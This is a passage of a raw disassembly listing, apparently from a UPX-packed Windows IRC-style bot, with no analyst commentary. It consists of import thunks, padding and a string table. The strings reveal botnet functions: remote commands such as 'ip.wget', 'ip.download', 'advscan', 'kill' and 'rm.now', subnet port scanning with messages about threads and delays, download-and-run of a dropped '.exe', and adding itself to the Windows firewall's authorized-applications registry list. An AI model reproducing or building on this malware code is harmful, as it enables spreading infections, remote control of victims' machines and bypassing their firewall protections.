call sub_40C6DA ; _controlfp
pop ecx
pop ecx
retn
sub_40C6AC endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B5A0
; ---------------------------------------------------------------------------
loc_40C6C4: ; DATA XREF: UPX0:0040C5A1�o
xor eax, eax
retn
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_1. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
jmp ds:dword_47B5A8
; ---------------------------------------------------------------------------
jmp ds:dword_47B5AC
; ---------------------------------------------------------------------------
jmp ds:dword_47B5B0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_40C6DA proc near ; CODE XREF: sub_40C6AC+A�p
jmp ds:dword_47B5B4
sub_40C6DA endp
; ---------------------------------------------------------------------------
jmp ds:dword_47B51C
; ---------------------------------------------------------------------------
jmp ds:dword_47B514
; ---------------------------------------------------------------------------
jmp ds:dword_47B510
; ---------------------------------------------------------------------------
jmp ds:dword_47B518
; ---------------------------------------------------------------------------
jmp ds:dword_47B520
; ---------------------------------------------------------------------------
jmp ds:dword_47B4FC
; ---------------------------------------------------------------------------
jmp ds:dword_47B508
; ---------------------------------------------------------------------------
jmp ds:dword_47B4F4
; ---------------------------------------------------------------------------
jmp ds:dword_47B4F0
; ---------------------------------------------------------------------------
jmp ds:dword_47B4F8
; ---------------------------------------------------------------------------
jmp ds:dword_47B4E8
; ---------------------------------------------------------------------------
jmp ds:dword_47B4E4
; ---------------------------------------------------------------------------
jmp ds:dword_47B4EC
; ---------------------------------------------------------------------------
jmp ds:dword_47B4DC
; ---------------------------------------------------------------------------
jmp ds:dword_47B4D8
; ---------------------------------------------------------------------------
jmp ds:dword_47B4E0
; ---------------------------------------------------------------------------
jmp ds:dword_47B4D0
; ---------------------------------------------------------------------------
jmp ds:dword_47B4CC
; ---------------------------------------------------------------------------
jmp ds:dword_47B4D4
; ---------------------------------------------------------------------------
jmp ds:dword_47B4C4
; ---------------------------------------------------------------------------
jmp ds:dword_47B4C0
; ---------------------------------------------------------------------------
jmp ds:dword_47B4C8
; ---------------------------------------------------------------------------
jmp ds:dword_47B4B8
; ---------------------------------------------------------------------------
jmp ds:dword_47B4B4
; ---------------------------------------------------------------------------
jmp ds:dword_47B4BC
; ---------------------------------------------------------------------------
jmp ds:dword_47B4AC
; ---------------------------------------------------------------------------
jmp ds:dword_47B4A8
; ---------------------------------------------------------------------------
jmp ds:dword_47B4B0
; ---------------------------------------------------------------------------
jmp ds:dword_47B500
; ---------------------------------------------------------------------------
jmp ds:dword_47B48C
; ---------------------------------------------------------------------------
jmp ds:dword_47B504
; ---------------------------------------------------------------------------
jmp ds:dword_47B50C
; ---------------------------------------------------------------------------
jmp ds:dword_47B4A4
; ---------------------------------------------------------------------------
jmp ds:dword_47B4A0
; ---------------------------------------------------------------------------
jmp ds:dword_47B49C
; ---------------------------------------------------------------------------
jmp ds:dword_47B498
; ---------------------------------------------------------------------------
jmp ds:dword_47B494
; ---------------------------------------------------------------------------
jmp ds:dword_47B490
; ---------------------------------------------------------------------------
jmp ds:dword_47B484
; ---------------------------------------------------------------------------
jmp ds:dword_47B480
; ---------------------------------------------------------------------------
jmp ds:dword_47B47C
; ---------------------------------------------------------------------------
jmp ds:dword_47B478
; ---------------------------------------------------------------------------
jmp ds:dword_47B474
; ---------------------------------------------------------------------------
jmp ds:dword_47B470
; ---------------------------------------------------------------------------
jmp ds:dword_47B46C
; ---------------------------------------------------------------------------
jmp ds:dword_47B468
; ---------------------------------------------------------------------------
jmp ds:dword_47B464
; ---------------------------------------------------------------------------
jmp ds:dword_47B460
; ---------------------------------------------------------------------------
jmp ds:dword_47B488
; ---------------------------------------------------------------------------
jmp ds:dword_47B45C
; ---------------------------------------------------------------------------
jmp ds:dword_47B454
; ---------------------------------------------------------------------------
jmp ds:dword_47B450
; ---------------------------------------------------------------------------
jmp ds:dword_47B44C
; ---------------------------------------------------------------------------
jmp ds:dword_47B448
; ---------------------------------------------------------------------------
jmp ds:dword_47B458
; ---------------------------------------------------------------------------
jmp ds:dword_47B444
; ---------------------------------------------------------------------------
jmp ds:dword_47B43C
; ---------------------------------------------------------------------------
jmp ds:dword_47B438
; ---------------------------------------------------------------------------
jmp ds:dword_47B440
; ---------------------------------------------------------------------------
jmp ds:dword_47B634
; ---------------------------------------------------------------------------
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ'
db 'ÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌÌ',0
dd 203h dup(0)
dword_40E000 dd 6C6C61h dword_40E004 dd 6E692E6Ch, 0 ; sub_406B46:loc_406C57�o
dword_40E00C dd 2E676F6Ch, 6E69h ; sub_406B46+127�o
aThreads db 'threads',0 ; DATA XREF: sub_401B8B+8D�o
; sub_401B8B+1B5�o
aT: ; DATA XREF: sub_401B8B+9E�o
; sub_401B8B+1C6�o
unicode 0, <t>,0
aSub db 'sub',0 ; DATA XREF: sub_401B8B+B94�o
aKill db 'kill',0 ; DATA XREF: sub_401B8B+A86�o
align 4
aK: ; DATA XREF: sub_401B8B+A94�o
unicode 0, <k>,0
aL_out db 'l.out',0 ; DATA XREF: sub_401B8B+40�o
; sub_401B8B+173�o
align 4
aLo db 'lo',0 ; DATA XREF: sub_401B8B+51�o
; sub_401B8B+184�o
align 4
aHttp db 'http',0 ; DATA XREF: sub_401B8B+21D�o
align 4
aStaticftp db 'staticftp',0 ; DATA XREF: sub_401B8B+1FB�o
align 10h
aSftp db 'sftp',0 ; DATA XREF: sub_401B8B+20C�o
align 4
aRm_die db 'rm.die',0 ; DATA XREF: sub_401B8B+62�o
; sub_401B8B+193�o
align 10h
aRm_now db 'rm.now',0 ; DATA XREF: sub_401B8B+73�o
; sub_401B8B+1A4�o
align 4
aAdvscan db 'advscan',0 ; DATA XREF: sub_401B8B+EB�o
; sub_401B8B+2BD�o
aAsc db 'asc',0 ; DATA XREF: sub_401B8B+F8�o
; sub_401B8B+2CE�o
aIp_wget db 'ip.wget',0 ; DATA XREF: sub_401B8B+AF�o
; sub_401B8B+1D9�o
aIp_download db 'ip.download',0 ; DATA XREF: sub_401B8B+C0�o
; sub_401B8B+1EA�o
aR0flz_updt db 'r0flz.updt',0 ; DATA XREF: sub_401B8B+D1�o
; sub_401B8B+2DF�o
align 4
aR4wr_nb db 'r4wr.nb',0 ; DATA XREF: sub_401B8B+DE�o
; sub_401B8B+2EC�o
dd 9 dup(0)
dbl_40E0C0 dq 9.765625e-4 ; DATA XREF: UPX0:004032D5�r
; UPX0:004032EA�r
align 10h
dword_40E0D0 dd 0FFFFFFFFh, 407621h, 407625h, 0dbl_40E0E0 dq -3.0517578125e-5 ; DATA XREF: UPX0:00407686�r
align 10h
dword_40E0F0 dd 0FFFFFFFFh, 40C668h, 40C67Ch, 3C1h dup(0)dword_40F000 dd 41h dup(0) dd offset asc_40362E+14Dh
dd 40h dup(0)
dword_40F208 dd 41h dup(0) dword_40F30C dd 41h dup(0) dword_40F410 dd 44h dup(0) aSystemCurrentc db 'SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\Firewal'
; DATA XREF: sub_401613+BF�o
db 'lPolicy\StandardProfile\AuthorizedApplications\List',0
align 4
dd 5 dup(0)
aSS_0 db '%s:*:%s',0 ; DATA XREF: sub_401613+98�o
align 8
a2: ; DATA XREF: sub_401613+7C�o
unicode 0, <2>,0
aCurrentuser db 'CurrentUser',0 ; DATA XREF: sub_401727+1E�o
dd 0
dword_40F5CC dd 3430033Ah, 72657002h, 74736973h, 65636E61h, 3A0203h
; DATA XREF: sub_40186B:loc_4019DB�o
dd 0
aShell_traywnd db 'Shell_TrayWnd',0 ; DATA XREF: sub_40186B+97�o
align 4
aWinexec db 'WinExec',0 ; DATA XREF: sub_40186B+6D�o
align 10h
aSleep db 'Sleep',0 ; DATA XREF: sub_40186B+5F�o
align 4
aReleasemutex db 'ReleaseMutex',0 ; DATA XREF: sub_40186B+51�o
align 4
aGetlasterror db 'GetLastError',0 ; DATA XREF: sub_40186B+43�o
align 4
aCreatemutexa db 'CreateMutexA',0 ; DATA XREF: sub_40186B+35�o
align 4
aCreatefilea db 'CreateFileA',0 ; DATA XREF: sub_40186B+27�o
align 8
aClosehandle db 'CloseHandle',0 ; DATA XREF: sub_40186B+1F�o
align 8
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_40186B+C�o
; sub_4053A3+A�o
align 4
aS_ db '%s [+].',0 ; DATA XREF: sub_406B46+220�o
aS__0 db '%s .',0 ; DATA XREF: sub_406B46+207�o
align 4
aSS_1 db '%s "%s")',0
align 4
aSSS@STriedS db '%s %s!%s@%s (Tried: %s)',0 ; DATA XREF: sub_406B46+1B6�o
align 10h
aSSOut_ db '%s %s out.',0 ; DATA XREF: sub_401B8B+CF5�o
aSSIOut_ db '%s S <%i> out.',0 ; DATA XREF: sub_401B8B+CA0�o
align 4
aSNoLI db '%s No L: <%i>',0 ; DATA XREF: sub_401B8B+CB2�o
align 4
aSII db '%s I: <%i>',0 ; DATA XREF: sub_401B8B+CC4�o
align 4
aSSDTS_ db '%s S: <%d> t(s).',0 ; DATA XREF: sub_401B8B+AD2�o
align 4
aSN_ db '%s N.',0 ; DATA XREF: sub_401B8B+AEA�o
align 4
aSKTS db '%s K t: <%s>',0 ; DATA XREF: sub_401B8B+B1A�o
align 4
aSFToKTS db '%s F to k t: <%s>',0 ; DATA XREF: sub_401B8B+B35�o
align 4
aSSARunD_ db '%s %s a run: <%d>.',0 ; DATA XREF: sub_401B8B:loc_401EDA�o
align 4
aSFToSSED_ db '%s F to s %s, e: <%d>.',0 ; DATA XREF: sub_401B8B:loc_402035�o
align 4
aErrS_ db 'err! %s.',0 ; DATA XREF: sub_406EA7+8D�o
align 10h
aSN__0 db '%s n.',0
align 4
dword_40F758 dd 2343003h, 6F6D6572h, 3646576h, 25203A02h, 73252173h
; DATA XREF: sub_401B8B+C3E�o
dd 732540h
dword_40F770 dd 2343003h, 61647075h, 3646574h, 2dword_40F780 dd 73207325h, 74726174h, 2E6465hoff_40F78C dd offset word_482E46 ; DATA XREF: UPX0:loc_406966�o
dword_40F790 dd 62207325h, 66206461h, 2E6D726Fh, 10h dup(0)
; DATA XREF: sub_401B8B:loc_401E9C�o
dword_40F7DC dd 4C494146h, 63204445h, 2E646Dh, 0dword_40F7EC dd 2Ah dword_40F7F0 dd 3430033Ah, 72687402h, 73646165h, 203A0203h, 7473696Ch
; DATA XREF: sub_401B8B+BAF�o
dd 2Eh, 0
aSDlUrlSToS_ db '%s DL URL: %s to: %s.',0 ; DATA XREF: sub_401B8B+9EA�o
; sub_401B8B+A5D�o
align 8
dword_40F828 dd 3430032Dh, 66635B02h, 35D7074h, 6F202D02h, 6Eh, 0
; DATA XREF: sub_401B8B+95E�o
aFailedToStar_1 db 'Failed to start scan thread, error: <%d>.',0
; DATA XREF: sub_401B8B+8D1�o
align 4
dd 2 dup(0)
aSPortScanStart db '%s Port Scan started on %s:%d with a delay of %d seconds for %d m'
; DATA XREF: sub_401B8B+81E�o
db 'inutes using %d threads.',0
align 10h
dd 4 dup(0)
aSequential db 'Sequential',0 ; DATA XREF: sub_401B8B+810�o
; sub_401B8B+892�o ...
align 10h
aRandom db 'Random',0 ; DATA XREF: sub_401B8B+809�o
; sub_401B8B+88B�o ...
align 4
aNoSubnetClassS db 'No subnet class specified, try "-a" or "-b" or "-c"',0
; DATA XREF: sub_401B8B+706�o
dd 3 dup(0)
aCouldNotParseE db 'Could not parse external IP.',0 ; DATA XREF: sub_401B8B+6F3�o
align 4
dd 0
aFailedToStar_0 db 'Failed to start scan, no IP specified.',0 ; DATA XREF: sub_401B8B+695�o
align 4
dd 2 dup(0)
aD_x_x_x db '%d.x.x.x',0 ; DATA XREF: sub_401B8B+612�o
align 4
aX_x_x_x db 'x.x.x.x',0 ; DATA XREF: sub_401B8B+5D4�o
dd 0
aFailedToStartS db 'Failed to start scan, port is invalid.',0 ; DATA XREF: sub_401B8B+5BE�o
align 4
dd 2 dup(0)
aAlreadyScannin db 'Already scanning with %d threads. Too many specified.',0
; DATA XREF: sub_401B8B+503�o
align 4
dd 2 dup(0)
aSDlingFromSToS db '%s dling from: %s to: %s.',0 ; DATA XREF: sub_401B8B+41E�o
; sub_401B8B+48A�o
align 10h
dd 0
aSeme_DDDDD_exe db '%seme_%d%d%d%d%d.exe',0 ; DATA XREF: sub_401B8B+3BC�o
align 10h
aTt db 'tt',0 ; DATA XREF: sub_401B8B+345�o
; sub_401B8B+4A4�o ...
align 4
dword_40FA54 dd 3430032Dh, 68635B02h, 5D707474h, 202D0203h, 7325h, 0
; DATA XREF: sub_401B8B+2A0�o
dword_40FA6C dd 3430032Dh, 68635B02h, 5D707474h, 202D0203h, 66666Fh
; DATA XREF: sub_401B8B+25B�o
dd 0
aStop db 'stop',0 ; DATA XREF: sub_401B8B+237�o
align 4
aTlist db 'tlist',0 ; DATA XREF: sub_401B8B:loc_401CF3�o
; sub_401B8B+B55�o ...
align 4
aDl db 'dl',0 ; DATA XREF: sub_401B8B:loc_401CEC�o
align 4
